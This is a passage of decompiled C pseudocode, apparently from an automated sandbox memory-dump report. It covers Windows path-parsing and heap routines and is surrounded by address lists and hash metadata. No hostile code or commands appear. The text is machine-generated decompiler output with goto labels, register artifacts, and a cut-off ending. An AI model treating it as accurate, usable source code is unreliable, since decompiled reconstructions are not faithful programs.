                                                                                          				_v544 = _a20;
                                                                                          				if( *__edx <= 8) {
                                                                                          					L3:
                                                                                          					if(_t260 != 0) {
                                                                                          						 *_t260 = 0;
                                                                                          					}
                                                                                          					_t254 =  &_v532;
                                                                                          					_v588 = 0x208;
                                                                                          					if((_v548 & 0x00000001) != 0) {
                                                                                          						_v556 =  *_t315;
                                                                                          						_v552 = _t315[2];
                                                                                          						_t161 = E01B6F232( &_v556);
                                                                                          						_t316 = _v556;
                                                                                          						_v540 = _t161;
                                                                                          						goto L17;
                                                                                          					} else {
                                                                                          						_t306 = 0x208;
                                                                                          						_t298 = _t315;
                                                                                          						_t316 = E01B56E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                          						if(_t316 == 0) {
                                                                                          							L68:
                                                                                          							_t322 = 0xc0000033;
                                                                                          							goto L39;
                                                                                          						} else {
                                                                                          							while(_v581 == 0) {
                                                                                          								_t233 = _v588;
                                                                                          								if(_t316 > _t233) {
                                                                                          									_t234 = _v548;
                                                                                          									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                          										_t254 = L01B54620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                          										if(_t254 == 0) {
                                                                                          											_t169 = 0xc0000017;
                                                                                          										} else {
                                                                                          											_t298 = _v564;
                                                                                          											_v588 = _t316;
                                                                                          											_t306 = _t316;
                                                                                          											_t316 = E01B56E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                          											if(_t316 != 0) {
                                                                                          												continue;
                                                                                          											} else {
                                                                                          												goto L68;
                                                                                          											}
                                                                                          										}
                                                                                          									} else {
                                                                                          										goto L90;
                                                                                          									}
                                                                                          								} else {
                                                                                          									_v556 = _t316;
                                                                                          									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                          									_v552 = _t254;
                                                                                          									if(_t316 < 2) {
                                                                                          										L11:
                                                                                          										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                          											_t161 = 5;
                                                                                          										} else {
                                                                                          											if(_t316 < 6) {
                                                                                          												L87:
                                                                                          												_t161 = 3;
                                                                                          											} else {
                                                                                          												_t242 = _t254[2] & 0x0000ffff;
                                                                                          												if(_t242 != 0x5c) {
                                                                                          													if(_t242 == 0x2f) {
                                                                                          														goto L16;
                                                                                          													} else {
                                                                                          														goto L87;
                                                                                          													}
                                                                                          													goto L101;
                                                                                          												} else {
                                                                                          													L16:
                                                                                          													_t161 = 2;
                                                                                          												}
                                                                                          											}
                                                                                          										}
                                                                                          									} else {
                                                                                          										_t243 =  *_t254 & 0x0000ffff;
                                                                                          										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                          											if(_t316 < 4) {
                                                                                          												L81:
                                                                                          												_t161 = 4;
                                                                                          												goto L17;
                                                                                          											} else {
                                                                                          												_t244 = _t254[1] & 0x0000ffff;
                                                                                          												if(_t244 != 0x5c) {
                                                                                          													if(_t244 == 0x2f) {
                                                                                          														goto L60;
                                                                                          													} else {
                                                                                          														goto L81;
                                                                                          													}
                                                                                          												} else {
                                                                                          													L60:
                                                                                          													if(_t316 < 6) {
                                                                                          														L83:
                                                                                          														_t161 = 1;
                                                                                          														goto L17;
                                                                                          													} else {
                                                                                          														_t245 = _t254[2] & 0x0000ffff;
                                                                                          														if(_t245 != 0x2e) {
                                                                                          															if(_t245 == 0x3f) {
                                                                                          																goto L62;
                                                                                          															} else {
                                                                                          																goto L83;
                                                                                          															}
                                                                                          														} else {
                                                                                          															L62:
                                                                                          															if(_t316 < 8) {
                                                                                          																L85:
                                                                                          																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                          																goto L17;
                                                                                          															} else {
                                                                                          																_t250 = _t254[3] & 0x0000ffff;
                                                                                          																if(_t250 != 0x5c) {
                                                                                          																	if(_t250 == 0x2f) {
                                                                                          																		goto L64;
                                                                                          																	} else {
                                                                                          																		goto L85;
                                                                                          																	}
                                                                                          																} else {
                                                                                          																	L64:
                                                                                          																	_t161 = 6;
                                                                                          																	goto L17;
                                                                                          																}
                                                                                          															}
                                                                                          														}
                                                                                          													}
                                                                                          												}
                                                                                          											}
                                                                                          											goto L101;
                                                                                          										} else {
                                                                                          											goto L11;
                                                                                          										}
                                                                                          									}
                                                                                          									L17:
                                                                                          									if(_t161 != 2) {
                                                                                          										_t162 = _t161 - 1;
                                                                                          										if(_t162 > 5) {
                                                                                          											goto L18;
                                                                                          										} else {
                                                                                          											switch( *((intOrPtr*)(_t162 * 4 +  &M01B545F8))) {
                                                                                          												case 0:
                                                                                          													_v568 = 0x1b11078;
                                                                                          													__eax = 2;
                                                                                          													goto L20;
                                                                                          												case 1:
                                                                                          													goto L18;
                                                                                          												case 2:
                                                                                          													_t163 = 4;
                                                                                          													goto L19;
                                                                                          											}
                                                                                          										}
                                                                                          										goto L41;
                                                                                          									} else {
                                                                                          										L18:
                                                                                          										_t163 = 0;
                                                                                          										L19:
                                                                                          										_v568 = 0x1b111c4;
                                                                                          									}
                                                                                          									L20:
                                                                                          									_v588 = _t163;
                                                                                          									_v564 = _t163 + _t163;
                                                                                          									_t306 =  *_v568 & 0x0000ffff;
                                                                                          									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                          									_v576 = _t265;
                                                                                          									if(_t265 > 0xfffe) {
                                                                                          										L90:
                                                                                          										_t322 = 0xc0000106;
                                                                                          									} else {
                                                                                          										if(_t321 != 0) {
                                                                                          											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                          												if(_v580 != 0) {
                                                                                          													goto L23;
                                                                                          												} else {
                                                                                          													_t322 = 0xc0000106;
                                                                                          													goto L39;
                                                                                          												}
                                                                                          											} else {
                                                                                          												_t177 = _t306;
                                                                                          												goto L25;
                                                                                          											}
                                                                                          											goto L101;
                                                                                          										} else {
                                                                                          											if(_v580 == _t321) {
                                                                                          												_t322 = 0xc000000d;
                                                                                          											} else {
                                                                                          												L23:
                                                                                          												_t173 = L01B54620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                          												_t269 = _v592;
                                                                                          												_t269[2] = _t173;
                                                                                          												if(_t173 == 0) {
                                                                                          													_t322 = 0xc0000017;
                                                                                          												} else {
                                                                                          													_t316 = _v556;
                                                                                          													 *_t269 = 0;
                                                                                          													_t321 = _t269;
                                                                                          													_t269[1] = _v576;
                                                                                          													_t177 =  *_v568 & 0x0000ffff;
                                                                                          													L25:
                                                                                          													_v580 = _t177;
                                                                                          													if(_t177 == 0) {
                                                                                          														L29:
                                                                                          														_t307 =  *_t321 & 0x0000ffff;
                                                                                          													} else {
                                                                                          														_t290 =  *_t321 & 0x0000ffff;
                                                                                          														_v576 = _t290;
                                                                                          														_t310 = _t177 & 0x0000ffff;
                                                                                          														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                          															_t307 =  *_t321 & 0xffff;
                                                                                          														} else {
                                                                                          															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                          															E01B7F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                          															_t329 = _t329 + 0xc;
                                                                                          															_t311 = _v580;
                                                                                          															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                          															 *_t321 = _t225;
                                                                                          															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                          																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                          															}
                                                                                          															goto L29;
                                                                                          														}
                                                                                          													}
                                                                                          													_t271 = _v556 - _v588 + _v588;
                                                                                          													_v580 = _t307;
                                                                                          													_v576 = _t271;
                                                                                          													if(_t271 != 0) {
                                                                                          														_t308 = _t271 & 0x0000ffff;
                                                                                          														_v588 = _t308;
                                                                                          														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                          															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                          															E01B7F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                          															_t329 = _t329 + 0xc;
                                                                                          															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                          															 *_t321 = _t213;
                                                                                          															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                          																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                          															}
                                                                                          														}
                                                                                          													}
                                                                                          													_t272 = _v560;
                                                                                          													if(_t272 != 0) {
                                                                                          														 *_t272 = _t321;
                                                                                          													}
                                                                                          													_t306 = 0;
                                                                                          													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                          													_t275 = _v572;
                                                                                          													if(_t275 != 0) {
                                                                                          														_t306 =  *_t275;
                                                                                          														if(_t306 != 0) {
                                                                                          															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                          														}
                                                                                          													}
                                                                                          													_t181 = _v544;
                                                                                          													if(_t181 != 0) {
                                                                                          														 *_t181 = 0;
                                                                                          														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                          														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                          														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                          														if(_v540 == 5) {
                                                                                          															_t182 = E01B352A5(1);
                                                                                          															_v588 = _t182;
                                                                                          															if(_t182 == 0) {
                                                                                          																E01B4EB70(1, 0x1c279a0);
                                                                                          																goto L38;
                                                                                          															} else {
                                                                                          																_v560 = _t182 + 0xc;
                                                                                          																_t185 = E01B4AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                          																if(_t185 == 0) {
                                                                                          																	_t324 = _v588;
                                                                                          																	goto L97;
                                                                                          																} else {
                                                                                          																	_t306 = _v544;
                                                                                          																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                          																	 *(_t306 + 4) = _t282;
                                                                                          																	_v576 = _t282;
                                                                                          																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                          																	 *_t306 = _t325;
                                                                                          																	if( *_t282 == 0x5c) {
                                                                                          																		_t149 = _t325 - 2; // -2
                                                                                          																		_t283 = _t149;
                                                                                          																		 *_t306 = _t283;
                                                                                          																		 *(_t306 + 4) = _v576 + 2;
                                                                                          																		_t185 = _t283 & 0x0000ffff;
                                                                                          																	}
                                                                                          																	_t324 = _v588;
                                                                                          																	 *(_t306 + 2) = _t185;
                                                                                          																	if((_v548 & 0x00000002) == 0) {
                                                                                          																		L97:
                                                                                          																		asm("lock xadd [esi], eax");
                                                                                          																		if((_t185 | 0xffffffff) == 0) {
                                                                                          																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                          																			E01B795D0();
                                                                                          																			L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                          																		}
                                                                                          																	} else {
                                                                                          																		 *(_t306 + 0xc) = _t324;
                                                                                          																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                          																	}
                                                                                          																	goto L38;
                                                                                          																}
                                                                                          															}
                                                                                          															goto L41;
                                                                                          														}
                                                                                          													}
                                                                                          													L38:
                                                                                          													_t322 = 0;
                                                                                          												}
                                                                                          											}
                                                                                          										}
                                                                                          									}
                                                                                          									L39:
                                                                                          									if(_t254 !=  &_v532) {
                                                                                          										L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                          									}
                                                                                          									_t169 = _t322;
                                                                                          								}
                                                                                          								goto L41;
                                                                                          							}
                                                                                          							goto L68;
                                                                                          						}
                                                                                          					}
                                                                                          					L41:
                                                                                          					_pop(_t317);
                                                                                          					_pop(_t323);
                                                                                          					_pop(_t255);
                                                                                          					return E01B7B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                          				} else {
                                                                                          					_t299 = __edx[2];
                                                                                          					if( *_t299 == 0x5c) {
                                                                                          						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                          						if(_t256 != 0x5c) {
                                                                                          							if(_t256 != 0x3f) {
                                                                                          								goto L2;
                                                                                          							} else {
                                                                                          								goto L50;
                                                                                          							}
                                                                                          						} else {
                                                                                          							L50:
                                                                                          							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                          								goto L2;
                                                                                          							} else {
                                                                                          								_t251 = E01B73D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                          								_pop(_t319);
                                                                                          								_pop(_t326);
                                                                                          								_pop(_t257);
                                                                                          								return E01B7B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                          							}
                                                                                          						}
                                                                                          					} else {
                                                                                          						L2:
                                                                                          						_t260 = _v572;
                                                                                          						goto L3;
                                                                                          					}
                                                                                          				}
                                                                                          				L101:
                                                                                          			}
                                                                                          0x01b542c2
                                                                                          0x01b542ca
                                                                                          0x01b542cd
                                                                                          0x01b542cd
                                                                                          0x01b542d4
                                                                                          0x01b5433f
                                                                                          0x01b5433f
                                                                                          0x01b542d6
                                                                                          0x01b542d6
                                                                                          0x01b542d9
                                                                                          0x01b542dd
                                                                                          0x01b542eb
                                                                                          0x01b9e23a
                                                                                          0x01b542f1
                                                                                          0x01b54305
                                                                                          0x01b5430d
                                                                                          0x01b54315
                                                                                          0x01b54318
                                                                                          0x01b5431f
                                                                                          0x01b54322
                                                                                          0x01b5432e
                                                                                          0x01b5433b
                                                                                          0x01b5433b
                                                                                          0x00000000
                                                                                          0x01b5432e
                                                                                          0x01b542eb
                                                                                          0x01b5434c
                                                                                          0x01b5434e
                                                                                          0x01b54352
                                                                                          0x01b54359
                                                                                          0x01b5435e
                                                                                          0x01b54361
                                                                                          0x01b5436e
                                                                                          0x01b5438a
                                                                                          0x01b5438e
                                                                                          0x01b54396
                                                                                          0x01b5439e
                                                                                          0x01b543a1
                                                                                          0x01b543ad
                                                                                          0x01b543bb
                                                                                          0x01b543bb
                                                                                          0x01b543ad
                                                                                          0x01b5436e
                                                                                          0x01b543bf
                                                                                          0x01b543c5
                                                                                          0x01b54463
                                                                                          0x01b54463
                                                                                          0x01b543ce
                                                                                          0x01b543d5
                                                                                          0x01b543d9
                                                                                          0x01b543df
                                                                                          0x01b54475
                                                                                          0x01b54479
                                                                                          0x01b54491
                                                                                          0x01b54491
                                                                                          0x01b54479
                                                                                          0x01b543e5
                                                                                          0x01b543eb
                                                                                          0x01b543f4
                                                                                          0x01b543f6
                                                                                          0x01b543f9
                                                                                          0x01b543fc
                                                                                          0x01b543ff
                                                                                          0x01b544e8
                                                                                          0x01b544ed
                                                                                          0x01b544f3
                                                                                          0x01b9e247
                                                                                          0x00000000
                                                                                          0x01b544f9
                                                                                          0x01b54504
                                                                                          0x01b54508
                                                                                          0x01b5450f
                                                                                          0x01b9e269
                                                                                          0x00000000
                                                                                          0x01b54515
                                                                                          0x01b54519
                                                                                          0x01b54531
                                                                                          0x01b54534
                                                                                          0x01b54537
                                                                                          0x01b5453e
                                                                                          0x01b54541
                                                                                          0x01b5454a
                                                                                          0x01b9e255
                                                                                          0x01b9e255
                                                                                          0x01b9e25b
                                                                                          0x01b9e25e
                                                                                          0x01b9e261
                                                                                          0x01b9e261
                                                                                          0x01b54555
                                                                                          0x01b54559
                                                                                          0x01b5455d
                                                                                          0x01b9e26d
                                                                                          0x01b9e270
                                                                                          0x01b9e274
                                                                                          0x01b9e27a
                                                                                          0x01b9e27d
                                                                                          0x01b9e28e
                                                                                          0x01b9e28e
                                                                                          0x01b54563
                                                                                          0x01b54563
                                                                                          0x01b54569
                                                                                          0x01b54569
                                                                                          0x00000000
                                                                                          0x01b5455d
                                                                                          0x01b5450f
                                                                                          0x00000000
                                                                                          0x01b544f3
                                                                                          0x01b543ff
                                                                                          0x01b54405
                                                                                          0x01b54405
                                                                                          0x01b54405
                                                                                          0x01b542ac
                                                                                          0x01b5428c
                                                                                          0x01b54282
                                                                                          0x01b54407
                                                                                          0x01b5440d
                                                                                          0x01b9e2af
                                                                                          0x01b9e2af
                                                                                          0x01b54413
                                                                                          0x01b54413
                                                                                          0x00000000
                                                                                          0x01b541d4
                                                                                          0x00000000
                                                                                          0x01b541c3
                                                                                          0x01b541bd
                                                                                          0x01b54415
                                                                                          0x01b54415
                                                                                          0x01b54416
                                                                                          0x01b54417
                                                                                          0x01b54429
                                                                                          0x01b5416e
                                                                                          0x01b5416e
                                                                                          0x01b54175
                                                                                          0x01b54498
                                                                                          0x01b5449f
                                                                                          0x01b9e12d
                                                                                          0x00000000
                                                                                          0x01b9e133
                                                                                          0x00000000
                                                                                          0x01b9e133
                                                                                          0x01b544a5
                                                                                          0x01b544a5
                                                                                          0x01b544aa
                                                                                          0x00000000
                                                                                          0x01b544bb
                                                                                          0x01b544ca
                                                                                          0x01b544d6
                                                                                          0x01b544d7
                                                                                          0x01b544d8
                                                                                          0x01b544e3
                                                                                          0x01b544e3
                                                                                          0x01b544aa
                                                                                          0x01b5417b
                                                                                          0x01b5417b
                                                                                          0x01b5417b
                                                                                          0x00000000
                                                                                          0x01b5417b
                                                                                          0x01b54175
                                                                                          0x00000000

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 941afff021b8032de25538ae13fc381e65ffe1a78c660946066daaab0177a9a4
                                                                                          • Instruction ID: fba2bbeab35745799906e6b38b57c65e8aa557666640e78b43a26c5ea3df0735
                                                                                          • Opcode Fuzzy Hash: 941afff021b8032de25538ae13fc381e65ffe1a78c660946066daaab0177a9a4
                                                                                          • Instruction Fuzzy Hash: F6F19E706082518FCB68CF19C480B7ABBE1FF88754F1449AEF986CB251E735D982CB52
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 92%
                                                                                          			E01B620A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                                          				signed int _v16;
                                                                                          				signed int _v20;
                                                                                          				signed char _v24;
                                                                                          				intOrPtr _v28;
                                                                                          				signed int _v32;
                                                                                          				void* _v36;
                                                                                          				char _v48;
                                                                                          				signed int _v52;
                                                                                          				signed int _v56;
                                                                                          				unsigned int _v60;
                                                                                          				char _v64;
                                                                                          				unsigned int _v68;
                                                                                          				signed int _v72;
                                                                                          				char _v73;
                                                                                          				signed int _v74;
                                                                                          				char _v75;
                                                                                          				signed int _v76;
                                                                                          				void* _v81;
                                                                                          				void* _v82;
                                                                                          				void* _v89;
                                                                                          				void* _v92;
                                                                                          				void* _v97;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				void* __ebp;
                                                                                          				signed char _t128;
                                                                                          				void* _t129;
                                                                                          				signed int _t130;
                                                                                          				void* _t132;
                                                                                          				signed char _t133;
                                                                                          				intOrPtr _t135;
                                                                                          				signed int _t137;
                                                                                          				signed int _t140;
                                                                                          				signed int* _t144;
                                                                                          				signed int* _t145;
                                                                                          				intOrPtr _t146;
                                                                                          				signed int _t147;
                                                                                          				signed char* _t148;
                                                                                          				signed int _t149;
                                                                                          				signed int _t153;
                                                                                          				signed int _t169;
                                                                                          				signed int _t174;
                                                                                          				signed int _t180;
                                                                                          				void* _t197;
                                                                                          				void* _t198;
                                                                                          				signed int _t201;
                                                                                          				intOrPtr* _t202;
                                                                                          				intOrPtr* _t205;
                                                                                          				signed int _t210;
                                                                                          				signed int _t215;
                                                                                          				signed int _t218;
                                                                                          				signed char _t221;
                                                                                          				signed int _t226;
                                                                                          				char _t227;
                                                                                          				signed int _t228;
                                                                                          				void* _t229;
                                                                                          				unsigned int _t231;
                                                                                          				void* _t235;
                                                                                          				signed int _t240;
                                                                                          				signed int _t241;
                                                                                          				void* _t242;
                                                                                          				signed int _t246;
                                                                                          				signed int _t248;
                                                                                          				signed int _t252;
                                                                                          				signed int _t253;
                                                                                          				void* _t254;
                                                                                          				intOrPtr* _t256;
                                                                                          				intOrPtr _t257;
                                                                                          				unsigned int _t262;
                                                                                          				signed int _t265;
                                                                                          				void* _t267;
                                                                                          				signed int _t275;
                                                                                          
                                                                                          				_t198 = __ebx;
                                                                                          				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                                          				_v68 = __ecx;
                                                                                          				_v73 = 0;
                                                                                          				_t201 = __edx & 0x00002000;
                                                                                          				_t128 = __edx & 0xffffdfff;
                                                                                          				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                                          				_v72 = _t128;
                                                                                          				if((_t128 & 0x00000008) != 0) {
                                                                                          					__eflags = _t128 - 8;
                                                                                          					if(_t128 != 8) {
                                                                                          						L69:
                                                                                          						_t129 = 0xc000000d;
                                                                                          						goto L23;
                                                                                          					} else {
                                                                                          						_t130 = 0;
                                                                                          						_v72 = 0;
                                                                                          						_v75 = 1;
                                                                                          						L2:
                                                                                          						_v74 = 1;
                                                                                          						_t226 =  *0x1c28714; // 0x0
                                                                                          						if(_t226 != 0) {
                                                                                          							__eflags = _t201;
                                                                                          							if(_t201 != 0) {
                                                                                          								L62:
                                                                                          								_v74 = 1;
                                                                                          								L63:
                                                                                          								_t130 = _t226 & 0xffffdfff;
                                                                                          								_v72 = _t130;
                                                                                          								goto L3;
                                                                                          							}
                                                                                          							_v74 = _t201;
                                                                                          							__eflags = _t226 & 0x00002000;
                                                                                          							if((_t226 & 0x00002000) == 0) {
                                                                                          								goto L63;
                                                                                          							}
                                                                                          							goto L62;
                                                                                          						}
                                                                                          						L3:
                                                                                          						_t227 = _v75;
                                                                                          						L4:
                                                                                          						_t240 = 0;
                                                                                          						_v56 = 0;
                                                                                          						_t252 = _t130 & 0x00000100;
                                                                                          						if(_t252 != 0 || _t227 != 0) {
                                                                                          							_t240 = _v68;
                                                                                          							_t132 = E01B62EB0(_t240);
                                                                                          							__eflags = _t132 - 2;
                                                                                          							if(_t132 != 2) {
                                                                                          								__eflags = _t132 - 1;
                                                                                          								if(_t132 == 1) {
                                                                                          									goto L25;
                                                                                          								}
                                                                                          								__eflags = _t132 - 6;
                                                                                          								if(_t132 == 6) {
                                                                                          									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                                          									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                                          										goto L40;
                                                                                          									}
                                                                                          									_t197 = E01B62EB0(_t240 + 8);
                                                                                          									__eflags = _t197 - 2;
                                                                                          									if(_t197 == 2) {
                                                                                          										goto L25;
                                                                                          									}
                                                                                          								}
                                                                                          								L40:
                                                                                          								_t133 = 1;
                                                                                          								L26:
                                                                                          								_t228 = _v75;
                                                                                          								_v56 = _t240;
                                                                                          								__eflags = _t133;
                                                                                          								if(_t133 != 0) {
                                                                                          									__eflags = _t228;
                                                                                          									if(_t228 == 0) {
                                                                                          										L43:
                                                                                          										__eflags = _v72;
                                                                                          										if(_v72 == 0) {
                                                                                          											goto L8;
                                                                                          										}
                                                                                          										goto L69;
                                                                                          									}
                                                                                          									_t133 = E01B358EC(_t240);
                                                                                          									_t221 =  *0x1c25cac; // 0x16
                                                                                          									__eflags = _t221 & 0x00000040;
                                                                                          									if((_t221 & 0x00000040) != 0) {
                                                                                          										_t228 = 0;
                                                                                          										__eflags = _t252;
                                                                                          										if(_t252 != 0) {
                                                                                          											goto L43;
                                                                                          										}
                                                                                          										_t133 = _v72;
                                                                                          										goto L7;
                                                                                          									}
                                                                                          									goto L43;
                                                                                          								} else {
                                                                                          									_t133 = _v72;
                                                                                          									goto L6;
                                                                                          								}
                                                                                          							}
                                                                                          							L25:
                                                                                          							_t133 = _v73;
                                                                                          							goto L26;
                                                                                          						} else {
                                                                                          							L6:
                                                                                          							_t221 =  *0x1c25cac; // 0x16
                                                                                          							L7:
                                                                                          							if(_t133 != 0) {
                                                                                          								__eflags = _t133 & 0x00001000;
                                                                                          								if((_t133 & 0x00001000) != 0) {
                                                                                          									_t133 = _t133 | 0x00000a00;
                                                                                          									__eflags = _t221 & 0x00000004;
                                                                                          									if((_t221 & 0x00000004) != 0) {
                                                                                          										_t133 = _t133 | 0x00000400;
                                                                                          									}
                                                                                          								}
                                                                                          								__eflags = _t228;
                                                                                          								if(_t228 != 0) {
                                                                                          									_t133 = _t133 | 0x00000100;
                                                                                          								}
                                                                                          								_t229 = E01B74A2C(0x1c26e40, 0x1b74b30, _t133, _t240);
                                                                                          								__eflags = _t229;
                                                                                          								if(_t229 == 0) {
                                                                                          									_t202 = _a20;
                                                                                          									goto L100;
                                                                                          								} else {
                                                                                          									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                                          									L15:
                                                                                          									_t202 = _a20;
                                                                                          									 *_t202 = _t135;
                                                                                          									if(_t229 == 0) {
                                                                                          										L100:
                                                                                          										 *_a4 = 0;
                                                                                          										_t137 = _a8;
                                                                                          										__eflags = _t137;
                                                                                          										if(_t137 != 0) {
                                                                                          											 *_t137 = 0;
                                                                                          										}
                                                                                          										 *_t202 = 0;
                                                                                          										_t129 = 0xc0000017;
                                                                                          										goto L23;
                                                                                          									} else {
                                                                                          										_t242 = _a16;
                                                                                          										if(_t242 != 0) {
                                                                                          											_t254 = _t229;
                                                                                          											memcpy(_t242, _t254, 0xd << 2);
                                                                                          											_t267 = _t267 + 0xc;
                                                                                          											_t242 = _t254 + 0x1a;
                                                                                          										}
                                                                                          										_t205 = _a4;
                                                                                          										_t25 = _t229 + 0x48; // 0x48
                                                                                          										 *_t205 = _t25;
                                                                                          										_t140 = _a8;
                                                                                          										if(_t140 != 0) {
                                                                                          											__eflags =  *((char*)(_t267 + 0xa));
                                                                                          											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                                          												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                                          											} else {
                                                                                          												 *_t140 = 0;
                                                                                          											}
                                                                                          										}
                                                                                          										_t256 = _a12;
                                                                                          										if(_t256 != 0) {
                                                                                          											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                                          										}
                                                                                          										_t257 =  *_t205;
                                                                                          										_v48 = 0;
                                                                                          										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                                          										_v56 = 0;
                                                                                          										_v52 = 0;
                                                                                          										_t144 =  *( *[fs:0x30] + 0x50);
                                                                                          										if(_t144 != 0) {
                                                                                          											__eflags =  *_t144;
                                                                                          											if( *_t144 == 0) {
                                                                                          												goto L20;
                                                                                          											}
                                                                                          											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                          											goto L21;
                                                                                          										} else {
                                                                                          											L20:
                                                                                          											_t145 = 0x7ffe0384;
                                                                                          											L21:
                                                                                          											if( *_t145 != 0) {
                                                                                          												_t146 =  *[fs:0x30];
                                                                                          												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                                          												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                                          													_t147 = E01B57D50();
                                                                                          													__eflags = _t147;
                                                                                          													if(_t147 == 0) {
                                                                                          														_t148 = 0x7ffe0385;
                                                                                          													} else {
                                                                                          														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                          													}
                                                                                          													__eflags =  *_t148 & 0x00000020;
                                                                                          													if(( *_t148 & 0x00000020) != 0) {
                                                                                          														_t149 = _v72;
                                                                                          														__eflags = _t149;
                                                                                          														if(__eflags == 0) {
                                                                                          															_t149 = 0x1b15c80;
                                                                                          														}
                                                                                          														_push(_t149);
                                                                                          														_push( &_v48);
                                                                                          														 *((char*)(_t267 + 0xb)) = E01B6F6E0(_t198, _t242, _t257, __eflags);
                                                                                          														_push(_t257);
                                                                                          														_push( &_v64);
                                                                                          														_t153 = E01B6F6E0(_t198, _t242, _t257, __eflags);
                                                                                          														__eflags =  *((char*)(_t267 + 0xb));
                                                                                          														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                          															__eflags = _t153;
                                                                                          															if(_t153 != 0) {
                                                                                          																__eflags = 0;
                                                                                          																E01BB7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                                          																L01B52400(_t267 + 0x20);
                                                                                          															}
                                                                                          															L01B52400( &_v64);
                                                                                          														}
                                                                                          													}
                                                                                          												}
                                                                                          											}
                                                                                          											_t129 = 0;
                                                                                          											L23:
                                                                                          											return _t129;
                                                                                          										}
                                                                                          									}
                                                                                          								}
                                                                                          							}
                                                                                          							L8:
                                                                                          							_t275 = _t240;
                                                                                          							if(_t275 != 0) {
                                                                                          								_v73 = 0;
                                                                                          								_t253 = 0;
                                                                                          								__eflags = 0;
                                                                                          								L29:
                                                                                          								_push(0);
                                                                                          								_t241 = E01B62397(_t240);
                                                                                          								__eflags = _t241;
                                                                                          								if(_t241 == 0) {
                                                                                          									_t229 = 0;
                                                                                          									L14:
                                                                                          									_t135 = 0;
                                                                                          									goto L15;
                                                                                          								}
                                                                                          								__eflags =  *((char*)(_t267 + 0xb));
                                                                                          								 *(_t241 + 0x34) = 1;
                                                                                          								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                          									E01B52280(_t134, 0x1c28608);
                                                                                          									__eflags =  *0x1c26e48 - _t253; // 0x0
                                                                                          									if(__eflags != 0) {
                                                                                          										L48:
                                                                                          										_t253 = 0;
